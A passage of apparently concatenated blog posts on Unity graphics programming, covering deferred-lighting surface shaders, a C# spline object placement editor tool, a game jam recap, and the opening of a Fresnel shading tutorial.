<p>One final thing: Unity uses “deferred lighting” (aka Light Pre-Pass), which is different from the confusingly similar named “deferred rendering.” I won’t go into the differences here, but just be aware of this so you’re not confused later.</p>
<h2>So about those shaders...</h2>
<p>As you also may have noticed from the above description, deferred lighting assumes that all objects use the same lighting model. This doesn’t mean that objects can’t appear to be lit differently, but it does mean that things like light attenuation and how the diffuse and specular terms are calculation are uniform across all objects.</p>
<p>As such, one of the tradeoffs with deferred lighting is a loss of control in your shaders. Since the lighting model is uniform across all objects, we no longer get to define that per shader.</p>
<p>In light of this, surface shaders are the best way to tackle writing custom shaders for deferred lighting. They’re already set up to work with Unity’s system, and enforce the restrictions we’re working with by design.</p>
<h2>Let's write something already</h2>
<p>To start off, create a new shader. Unity will give you a skeleton of a surface shader. I’ll post it here for those of you not playing along at home:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Custom/DeferredDiffuse"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"RenderType"</span><span class="o">=</span><span class="s">"Opaque"</span> <span class="p">}</span>
<span class="n">LOD</span> <span class="mi">200</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf Lambert
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">half4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Out of the box, Unity’s built in lighting functions already will all work fine with deferred lighting, so technically, the above is a fully functioning diffuse deferred shader.</p>
<p>Here’s how this plays out in deferred lighting (roughly):</p>
<ul>
<li>The surface function defines all the material specific properties for this object</li>
<li>Unity computes the lighting buffer. If the surface function writes to a variable used in one of these buffers (like the fragment’s normal), the data for the buffer comes from the surface function instead of the raw geometry.</li>
<li>The Lambert lighting function controls how the lighting buffer and object’s surface properties get combined into the final output for the current fragment.</li>
</ul>
<p>Now, using the built in Lambert lighting function is cheating a bit, so let’s see how to write our own diffuse lighting function:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">float4</span> <span class="nf">LightingMyDiffuse_PrePass</span><span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">i</span><span class="p">,</span> <span class="n">float4</span> <span class="n">light</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">float4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">light</span><span class="p">.</span><span class="n">rgb</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>This is very similar to writing lighting functions for forward rendering. All you have to do is add “_PrePass” to the end of the function name, and change the input arguments to take the output struct from your surface function and a single float4 for the combined lighting at that pixel.</p>
<p>That’s really all there is to it. For completenesses sake, here’s the full shader, and how it looks:</p>
<div align="center">
<img src="/images/post_images/2014-04-05/Deferred_final.png" />
</div>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Shader</span> <span class="s">"Custom/DeferredDiffuse"</span>
<span class="p">{</span>
<span class="n">Properties</span>
<span class="p">{</span>
<span class="n">_MainTex</span> <span class="p">(</span><span class="s">"Base (RGB)"</span><span class="p">,</span> <span class="mi">2</span><span class="n">D</span><span class="p">)</span> <span class="o">=</span> <span class="s">"white"</span> <span class="p">{}</span>
<span class="p">}</span>
<span class="n">SubShader</span>
<span class="p">{</span>
<span class="n">Tags</span> <span class="p">{</span> <span class="s">"RenderType"</span><span class="o">=</span><span class="s">"Opaque"</span> <span class="p">}</span>
<span class="n">LOD</span> <span class="mi">200</span>
<span class="n">CGPROGRAM</span>
<span class="cp">#pragma surface surf MyDiffuse
</span>
<span class="n">sampler2D</span> <span class="n">_MainTex</span><span class="p">;</span>
<span class="k">struct</span> <span class="nc">Input</span> <span class="p">{</span>
<span class="n">float2</span> <span class="n">uv_MainTex</span><span class="p">;</span>
<span class="p">};</span>
<span class="kt">void</span> <span class="n">surf</span> <span class="p">(</span><span class="n">Input</span> <span class="n">IN</span><span class="p">,</span> <span class="n">inout</span> <span class="n">SurfaceOutput</span> <span class="n">o</span><span class="p">)</span> <span class="p">{</span>
<span class="n">half4</span> <span class="n">c</span> <span class="o">=</span> <span class="n">tex2D</span> <span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">IN</span><span class="p">.</span><span class="n">uv_MainTex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">rgb</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">Alpha</span> <span class="o">=</span> <span class="n">c</span><span class="p">.</span><span class="n">a</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">float4</span> <span class="n">LightingMyDiffuse_PrePass</span><span class="p">(</span><span class="n">SurfaceOutput</span> <span class="n">i</span><span class="p">,</span> <span class="n">float4</span> <span class="n">light</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">return</span> <span class="n">float4</span><span class="p">(</span><span class="n">i</span><span class="p">.</span><span class="n">Albedo</span> <span class="o">*</span> <span class="n">light</span><span class="p">.</span><span class="n">rgb</span><span class="p">,</span> <span class="mf">1.0</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">ENDCG</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<h2>Conclusion</h2>
<p>So there you have it, a custom diffuse shader for deferred lighting! Surface shaders really aren’t as much fun as regular pixel shaders (imo), but they definitely fit the bill in this case.</p>
<p>If you notice any errors, have a good system worked out for writing non surface shaders with Unity’s deferred path, or just want to say hi, send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Happy coding!</p>
A Spline Based Object Placement Tool2014-03-30T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/03/30/Placing-Objects-On-A-Spline<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore, but the basic idea is still valid. I just don't want to spend time updating old posts every time Unity increments a version number
</div>
<p>I’m convinced that one of the secrets to levelling up your Unity skills is to become very comfortable writing custom editor tools. Every project I’ve worked on in the past year has been made significantly better by building tools to automate repetitive or time consuming tasks.</p>
<p>For example, imagine you are working on a project which requires placing gems at even distances (like coins in Temple Run, or rings in Sonic). Placing all of these by hand isn’t a good use of anyone’s time, and making changes to these layouts sucks because moving a gem in the middle of a row means that everything after it needs to be adjusted as well.</p>
<p>A tool that automatically places objects at even spaces along a spline would not only allow you to get the objects placed faster, but make it way easier to make changes later. This post is going to show you the basics of how to put a tool like this together.</p>
<p>(there’s a unitypackage download at the end of this post if you just want the code).</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_placed.png" /><br />
</div>
<p><br /></p>
<h2>The General Idea</h2>
<p>The tool we’re building is fairly simple, but there are a few different parts we need to set up. We’ll cover these in order:</p>
<ul>
<li>A way to make a spline</li>
<li>A way to manipulate (and see) our spline</li>
<li>A way to place objects on the spline, and manage these objects</li>
</ul>
<h2>Making a Spline</h2>
<p>I could probably write a few blog posts just covering different spline creation algorithms, but thankfully the Unity wiki has us covered here. Head over there and grab the <a href="http://wiki.unity3d.com/index.php?title=Interpolate#Interpolate.cs">Interpolate.cs script</a>. This will handle all the complicated parts of creating our spline for us. All that’s left for us is to define the inputs.</p>
<p>If you look at Interpolate.cs, you’ll find the method that we’ll be using to generate our splines:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">IEnumerable</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span> <span class="n">NewCatmullRom</span><span class="p">(</span><span class="n">Transform</span><span class="p">[]</span> <span class="n">nodes</span><span class="p">,</span> <span class="kt">int</span> <span class="n">slices</span><span class="p">,</span> <span class="kt">bool</span> <span class="n">loop</span><span class="p">)</span> </code></pre></figure>
<p>So the inputs we need are an array of node positions (the initial control points that will define the shape of our spline), the number of slices (points placed between these initial nodes), whether or not we want our spline to loop and finally the GameObject we want to duplicate along the path.</p>
<p>However, none of the logic regarding what these inputs are should be put into Interpolate.cs, which means it’s time for us to start writing our custom tool class.</p>
<h2>Seeing and Manipulating the Spline</h2>
<p>So as mentioned, the first thing our tool will need to do is provide inputs to the Interpolate class. So let’s set that up:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">public</span> <span class="k">class</span> <span class="nc">SplinePlacer</span> <span class="p">:</span> <span class="n">MonoBehaviour</span>
<span class="p">{</span>
<span class="k">public</span> <span class="n">Transform</span><span class="p">[]</span> <span class="n">initialNodes</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">int</span> <span class="n">curveResolution</span><span class="p">;</span>
<span class="k">public</span> <span class="kt">bool</span> <span class="n">loop</span><span class="p">;</span>
<span class="k">public</span> <span class="n">GameObject</span> <span class="n">objectToPlace</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>You can go ahead and set these up in the inspector if you want, although you won’t see anything yet. so perhaps we should also set up the gizmos to visualize the spline. Gizmos (for those who are unfamiliar with them) are objects which are drawn in the scene view but do not appear in your actual game. We’re going to be using the Gizmo api to draw our spline.</p>
<p>To write a custom gizmo for a component, you need to override the OnDrawGizmos method. Let’s start by drawing a sphere at every initial node point, so that we don’t need the Transform objects we’re supplying to have a mesh renderer attached to them. The code below allocates an array of Vector3[]s that isn’t really being used in this example, but we will be using this array later, so I’ve included it now to avoid needing to change code as we go.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">OnDrawGizmos</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">Vector3</span><span class="p">[]</span> <span class="n">initialPoints</span> <span class="p">=</span> <span class="k">new</span> <span class="n">Vector3</span><span class="p">[</span><span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="p">++)</span>
<span class="p">{</span>
<span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">=</span> <span class="n">initialNodes</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">position</span><span class="p">;</span>
<span class="n">Gizmos</span><span class="p">.</span><span class="nf">DrawWireSphere</span><span class="p">(</span><span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="m">0.1f</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you switch back to the editor, and add a few empty GameObjects to the list of initialNodes, you should now have shiny wireframe spheres in the scene view to help you see what’s going on.</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_spheres.png" /><br />
</div>
<p><br /></p>
<p>Great! Now let’s get on with the business of actually seeing our spline.</p>
<p>To do this, we need to create a spline on every call of the OnDrawGizmos method, and draw a line segment between each node on the newly created spline (we create a new spline on every call so that we can see the updates to the spline as we move the nodes in the scene view).</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">void</span> <span class="nf">OnDrawGizmos</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">initialNodes</span> <span class="p">==</span> <span class="k">null</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span> <span class="p"><</span> <span class="m">2</span><span class="p">)</span> <span class="k">return</span><span class="p">;</span>
<span class="n">Vector3</span><span class="p">[]</span> <span class="n">initialPoints</span> <span class="p">=</span> <span class="k">new</span> <span class="n">Vector3</span><span class="p">[</span><span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">];</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="p">=</span> <span class="m">0</span><span class="p">;</span> <span class="n">i</span> <span class="p"><</span> <span class="n">initialNodes</span><span class="p">.</span><span class="n">Length</span><span class="p">;</span> <span class="n">i</span><span class="p">++)</span>
<span class="p">{</span>
<span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="p">=</span> <span class="n">initialNodes</span><span class="p">[</span><span class="n">i</span><span class="p">].</span><span class="n">position</span><span class="p">;</span>
<span class="n">Gizmos</span><span class="p">.</span><span class="nf">DrawWireSphere</span><span class="p">(</span><span class="n">initialPoints</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="m">0.15f</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">IEnumerable</span><span class="p"><</span><span class="n">Vector3</span><span class="p">></span> <span class="n">spline</span> <span class="p">=</span> <span class="n">Interpolate</span><span class="p">.</span><span class="nf">NewCatmullRom</span><span class="p">(</span><span class="n">initialNodes</span><span class="p">,</span>
<span class="n">curveResolution</span><span class="p">,</span>
<span class="n">loop</span><span class="p">);</span>
<span class="n">IEnumerator</span> <span class="n">iterator</span> <span class="p">=</span> <span class="n">spline</span><span class="p">.</span><span class="nf">GetEnumerator</span><span class="p">();</span>
<span class="n">iterator</span><span class="p">.</span><span class="nf">MoveNext</span><span class="p">();</span>
<span class="kt">var</span> <span class="n">lastPoint</span> <span class="p">=</span> <span class="n">initialPoints</span><span class="p">[</span><span class="m">0</span><span class="p">];</span>
<span class="k">while</span> <span class="p">(</span><span class="n">iterator</span><span class="p">.</span><span class="nf">MoveNext</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">Gizmos</span><span class="p">.</span><span class="nf">DrawLine</span><span class="p">(</span><span class="n">lastPoint</span><span class="p">,</span> <span class="p">(</span><span class="n">Vector3</span><span class="p">)</span><span class="n">iterator</span><span class="p">.</span><span class="n">Current</span><span class="p">);</span>
<span class="n">lastPoint</span> <span class="p">=</span> <span class="p">(</span><span class="n">Vector3</span><span class="p">)</span><span class="n">iterator</span><span class="p">.</span><span class="n">Current</span><span class="p">;</span>
<span class="c1">//prevent an infinite loop if we want our spline to loop</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lastPoint</span> <span class="p">==</span> <span class="n">initialPoints</span><span class="p">[</span><span class="m">0</span><span class="p">])</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>If you compile this, and throw a few control points into the inspector panel, you should be able to drag them around see something like this:</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_basic.png" /><br />
</div>
<p><br /></p>
<p>Although this looks cool, it really isn’t useful yet, which brings us to part 3:</p>
<h2>Placing Objects on the Spline</h2>
<p>The most common use case I’ve found for this type of tool is placing objects along the spline while setting up the scene (ie/ before runtime), so that’s what we’ll cover here.</p>
<p>I’ve found the most intuitive way to handle this is to write a custom inspector for the SplinePlacer class that draws a button that triggers the placement action. So lets do that now:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">using</span> <span class="n">UnityEngine</span><span class="p">;</span>
<span class="k">using</span> <span class="n">UnityEditor</span><span class="p">;</span>
<span class="k">using</span> <span class="n">System</span><span class="p">.</span><span class="n">Collections</span><span class="p">;</span>
<span class="p">[</span><span class="n">CustomEditor</span><span class="p">(</span><span class="n">typeof</span><span class="p">(</span><span class="n">SplinePlacer</span><span class="p">))]</span>
<span class="k">public</span> <span class="k">class</span> <span class="nc">SplinePlacerEditor</span> <span class="o">:</span> <span class="n">Editor</span>
<span class="p">{</span>
<span class="k">public</span> <span class="k">override</span> <span class="kt">void</span> <span class="n">OnInspectorGUI</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">DrawDefaultInspector</span><span class="p">();</span>
<span class="k">if</span> <span class="p">(</span><span class="n">GUILayout</span><span class="p">.</span><span class="n">Button</span><span class="p">(</span><span class="s">"Place Objects"</span><span class="p">))</span>
<span class="p">{</span>
<span class="n">SplinePlacer</span> <span class="n">placer</span> <span class="o">=</span> <span class="p">(</span><span class="n">SplinePlacer</span><span class="p">)</span><span class="n">target</span><span class="p">;</span>
<span class="n">placer</span><span class="p">.</span><span class="n">PlaceObjects</span><span class="p">();</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>This code won’t compile yet, because we haven’t defined the PlaceObjects method in SplinePlacer, so go ahead and add an empty method with that name now. Once you’ve done that, throw this new inspector class into your Editor folder and let it compile. If you click back to your spline placer object it should look something like this:</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_placer.png" /><br />
</div>
<p><br /></p>
<p>Now all that’s left is to actually have PlaceObjects do something and we’re good to go. This gets a bit a hairy, especially because I’m duplicating a lot of code so that I can present a self contained method for this tutorial, but the algorithm is as follows:</p>
<ul>
<li>Place an object at the first control point</li>
<li>Traverse a distance along the spline (our distance variable)</li>
<li>When we have moved far enough along, place another object</li>
<li>continue this process until we reach the end of the spline</li>
</ul>
<p>And an implementation of this might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">public</span> <span class="kt">void</span> <span class="nf">PlaceObjects</span><span class="p">()</span>
<span class="p">{</span>
<span class="c1">//To make things easier to understand</span>
<span class="c1">//we're going to parse the spline into a </span>
<span class="c1">//list of Vector3s instead of using the iterator</span>
<span class="n">IEnumerable</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span> <span class="n">spline</span> <span class="o">=</span> <span class="n">Interpolate</span><span class="p">.</span><span class="n">NewCatmullRom</span><span class="p">(</span><span class="n">initialNodes</span><span class="p">,</span>
<span class="n">curveResolution</span><span class="p">,</span>
<span class="n">loop</span><span class="p">);</span>
<span class="n">IEnumerator</span> <span class="n">iterator</span> <span class="o">=</span> <span class="n">spline</span><span class="p">.</span><span class="n">GetEnumerator</span><span class="p">();</span>
<span class="n">List</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span> <span class="n">splinePoints</span> <span class="o">=</span> <span class="k">new</span> <span class="n">List</span><span class="o"><</span><span class="n">Vector3</span><span class="o">></span><span class="p">();</span>
<span class="k">while</span> <span class="p">(</span><span class="n">iterator</span><span class="p">.</span><span class="n">MoveNext</span><span class="p">())</span>
<span class="p">{</span>
<span class="n">splinePoints</span><span class="p">.</span><span class="n">Add</span><span class="p">((</span><span class="n">Vector3</span><span class="p">)</span><span class="n">iterator</span><span class="p">.</span><span class="n">Current</span><span class="p">);</span>
<span class="p">}</span>
<span class="c1">//distanceToMove represents how much farther</span>
<span class="c1">//we need to progress down the spline before</span>
<span class="c1">//we place the next object</span>
<span class="kt">int</span> <span class="n">nextSplinePointIndex</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">distanceToMove</span> <span class="o">=</span> <span class="n">distanceBetweenObjects</span><span class="p">;</span>
<span class="c1">//our current position on the spline</span>
<span class="n">Vector3</span> <span class="n">positionIterator</span> <span class="o">=</span> <span class="n">splinePoints</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="c1">//our algo skips the first control point, so </span>
<span class="c1">//we need to manually place the first object</span>
<span class="n">GameObject</span><span class="p">.</span><span class="n">Instantiate</span><span class="p">(</span><span class="n">objectToPlace</span><span class="p">,</span> <span class="n">positionIterator</span><span class="p">,</span> <span class="n">Quaternion</span><span class="p">.</span><span class="n">identity</span><span class="p">);</span>
<span class="k">while</span><span class="p">(</span><span class="n">nextSplinePointIndex</span> <span class="o"><</span> <span class="n">splinePoints</span><span class="p">.</span><span class="n">Count</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">Vector3</span> <span class="n">direction</span> <span class="o">=</span> <span class="p">(</span><span class="n">splinePoints</span><span class="p">[</span><span class="n">nextSplinePointIndex</span><span class="p">]</span> <span class="o">-</span> <span class="n">positionIterator</span><span class="p">);</span>
<span class="n">direction</span> <span class="o">=</span> <span class="n">direction</span><span class="p">.</span><span class="n">normalized</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">distanceToNextPoint</span> <span class="o">=</span> <span class="n">Vector3</span><span class="p">.</span><span class="n">Distance</span><span class="p">(</span><span class="n">positionIterator</span><span class="p">,</span>
<span class="n">splinePoints</span><span class="p">[</span><span class="n">nextSplinePointIndex</span><span class="p">]);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">distanceToNextPoint</span> <span class="o">>=</span> <span class="n">distanceToMove</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">positionIterator</span> <span class="o">+=</span> <span class="n">direction</span><span class="o">*</span><span class="n">distanceToMove</span><span class="p">;</span>
<span class="n">GameObject</span><span class="p">.</span><span class="n">Instantiate</span><span class="p">(</span><span class="n">objectToPlace</span><span class="p">,</span>
<span class="n">positionIterator</span><span class="p">,</span>
<span class="n">Quaternion</span><span class="p">.</span><span class="n">identity</span><span class="p">);</span>
<span class="n">distanceToMove</span> <span class="o">=</span> <span class="n">distanceBetweenObjects</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">else</span>
<span class="p">{</span>
<span class="n">distanceToMove</span> <span class="o">-=</span> <span class="n">distanceToNextPoint</span><span class="p">;</span>
<span class="n">positionIterator</span> <span class="o">=</span> <span class="n">splinePoints</span><span class="p">[</span><span class="n">nextSplinePointIndex</span><span class="o">++</span><span class="p">];</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="p">}</span></code></pre></figure>
<p>Once this code compiles, pressing the “Place Objects” button should populate your spline with the object you provided to be duplicated.</p>
<div align="center">
<img src="/images/post_images/2014-03-30/Spline_placed.png" /><br />
YAY! :D
</div>
<p><br /></p>
<h2>Where to go next</h2>
<p>Depending on your needs, there are a ton of different ways to improve on this tool. One addition I’ve found useful is to bind a keyboard shortcut to the act of creating another initial node, adding it to the end of the list of nodes, and selecting it in the hierarchy. This simplifies the process of creating paths greatly.</p>
<p>Another option I’ve found handy in some cases is to automatically select all the spawned objects after placing them, allowing a really quick group edit of their components.</p>
<p>You may also want to write additional inspector buttons for doing things like deleting all spawned children, or serializing their positions, or any of a million other things that might make your specific use case better. There isn’t a “right” way to go about this, as long as your life is better when you’re done the tool.</p>
<p>If you’re running into any issues getting things to work, feel free to grab <a href="https://dl.dropboxusercontent.com/u/6128167/spline_placer.unitypackage">this unitypackage</a>, which contains all of the code presented above. If you’re still running into issues, or you have tools of your own that you want to share, send me a message <a href="http://twitter.com/khalladay">on twitter</a>!</p>
On Bacon Jam and Grilling Virtual Meat2014-03-24T00:00:00+00:00http://kylehalladay.com/blog/2014/03/24/Bacon-Jam-And-Vertex-Colours<div style="background-color:#EEAAAA;">NOTE: This article is OLD! Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p>Weekend game jams aren’t usually my thing. Generally speaking, I like having the weekend to recharge, and spending all of one getting little sleep and feverishly working to finish a (usually) throwaway project is not usually tempting. However, last weekend Reddit hosted the Bacon Jam, and I decided to partake since it had been awhile since I had actually finished a game and I felt like getting some momentum back.</p>
<p>The theme of the jam was “Hungry,” and I decided to make a game about grilling meat, because winter has been way too long and cold here in Ontario, and barbeque weather can’t get here fast enough. Although the jam technically ended on Sunday night, I knew that I had other things I needed to get done, and as such would be finishing on Saturday. I also knew I liked sleep, and had no intention of pulling a crazy caffeine fuelled coding binge (like I’ve done at most game jams). The end result was a very small game, that I finished leisurely well before the end of Saturday, and I ended up having a ton of fun doing things this way.</p>
<div align="center">
<img src="/images/post_images/2014-03-24/baconjamgameplay.png" /><br />
<font size="2">My entry for Bacon Jam 7</font>
</div>
<p><br /></p>
<p>Everyone says set your scope small when you’re at a jam, but I think the real secret to enjoying a game jam (and not just finishing it) is to set your project’s scope small enough to be completed within the first half of the jam. If you’re still feeling in the groove, you now have a ton of time to polish your project, and if you aren’t, you can pack up, or socialize, or do whatever the hell you want, and you still walk out of the jam with a finished product.</p>
<p>Aside from discovering a new, much more enjoyable, way to jam, what I found interesting about this weekend was that my project would have been pretty much impossible for me to complete a year ago, given that the core mechanic relies on a shader to pan between three textures (raw, cooked, burnt) on each fragment of meat, and a year ago I was still about 2 months out from really getting anywhere with shader dev. What a difference a year makes!</p>
<p>So, if you’ve been missing the feeling of cooking meat over an open flame lately, check out my game: <a href="http://www.kylehalladay.com/demos/ZenBurnt/ZenBurnt.html">Zen Burnt</a> (a play on the name Zen Bound), just keep your hopes down :P it’s a very very tiny jam game.</p>
<p>Also, I’ll get back to posting every other week or so now. Things got a bit derailed this month because I started a new job (hurray shader dev!), but I already have a much more typical tutorial post in the works for later this week. If ray/triangle intersection sounds interesting to you, check back this weekend!</p>
<p>Finally, as always, send me a message <a href="http://twitter.com/khalladay">on twitter</a> if you feel like it!</p>
The Basics of Fresnel Shading2014-02-18T00:00:00+00:00http://kylehalladay.com/blog/tutorial/2014/02/18/Fresnel-Shaders-From-The-Ground-Up<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!
</div>
<p><br /></p>
<p>I recently stumbled on the awesome article: <a href="http://filmicgames.com/archives/557">Everything Has Fresnel</a> (if you haven’t read it, go read it now). The main premise of the article is that real world materials are not actually as neat and tidy as programmers would like to believe, and more specifically, that virtually everything in real life has some degree of fresnel reflectivity.</p>
<p>Fresnel isn’t an effect that I’ve seen often in Unity projects and in fact wasn’t an effect that I was familiar with building, so I decided to kill two birds with one project and put together my latest shader pack: <a href="/all/graphics/2014/02/23/Fresnel-Shaders.html">Fresnel Shaders</a>. It’s all free to use, MIT license, all that jazz, so enjoy :D</p>
<p>But, as usual, I’d also like to make things a bit easier for the next googler looking for an intro to Fresnel reflection. So if writing Fresnel shaders (or adding Fresnel to existing ones) sounds as much fun to you as it was for me, read on!</p>
<div align="center">
<img src="/images/post_images/2014-02-23/FresnelRim.png" /><br />
<font size="2">An unlit Fresnel shader</font>
</div>
<p><br /></p>
<h2>What is the Fresnel Effect</h2>
<p>In essence, the fresnel effect describes the relationship between the angle that you look at a surface and the amount of reflectivity you see. This is very easy to demonstrate if you have a window nearby. If you look at the window straight on you can see through the window as intended, however, if you move so that you try to look through the window at a glancing angle (ie: your view direction is approaching parallel to the window’s surface) the window becomes much closer to a mirror.</p>
<p>But this effect isn’t limited to windows, or even particularly shiny objects. As John Hable points out in <a href="http://filmicgames.com/archives/557">Everything Has Fresnel</a>, pretty much everything (including towels and bricks!) exhibit the fresnel effect to some degree. I’ve made a game out of trying to spot instances of it as I walk to work (without looking I’ve lost my mind).</p>
<p>So what does this look like when added to an object in Unity? Here’s a few more examples from my shader pack:</p>
<div align="center">
<img src="/images/post_images/2014-02-23/AllFresnel.png" /><br />
<font size="2">The Shaders in the Fresnel Shader Pack</font>
</div>
<p><br /></p>
<h2>How is it implemented?</h2>
<p>As it turns out, Fresnel equations are complicated, way more so than can be adequately covered by a blog post, and way more than is feasible to execute in real time for most applications. In practice, it’s far more realistic to use an approximation of these equations. In searching, I’ve ended up finding two such approximations have so far seemed appropriate to use in real time shaders.</p>
<p>The first is the Schlick Approximation. This is easy enough to google for, but I’ll put here just for reference as well:</p>
<div align="center">
R(θ) = R<sub>0</sub> + (1 - R<sub>0</sub>)(1 - cosθ)<sup>5</sup>
</div>
<p><br />
In the above equation, R<sub>0</sub> refers to the reflection coefficient for light moving between 2 interfaces with different refractivity (most commonly, air and whatever type of material the surface is). If you’re really interested, definitely check out more detailed sources online. In practice, I’ve found that while this method gives decent looking results, the next option gives us much greater control over the appearance of our materials at the cost of physical correctness. Given that real time graphics are anything but physically correct, I’m ok with this tradeoff.</p>
<p>The second approximation comes from chapter 7 of the <a href="http://http.developer.nvidia.com/CgTutorial/cg_tutorial_chapter07.html">Cg Tutorial</a> from NVidia, which refers to it as the “Empricial Approximation.”<br />
<br /></p>
<div align="center">
R = max(0, min(1, bias + scale * (1.0 + I • N)<sup>power</sup>))
</div>
<p><br /></p>
<ul>
<li>R is a Fresnel term describing how strong the Fresnel effect is at a specific point</li>
<li>I is the vector from the eye to a point on the surface</li>
<li>N is the world space normal of the current point</li>
<li>bias, scale and power are values exposed to allow control over the appearance of the Fresnel effect</li>
</ul>
<p>This equation is a bit of a double edged sword. It’s very easy to make hideous looking Fresnel by tweaking the values of bias, scale and power, but it also gives you the ability to fine tune your materials to exactly how you want them to look.</p>
<div align="center">
<img src="/images/post_images/2014-02-23/UglyFresnel.png" /><br />
<font size="2">Fresnel gone wrong</font>
</div>
<p><br /></p>
<h2>A Fresnel Shader</h2>
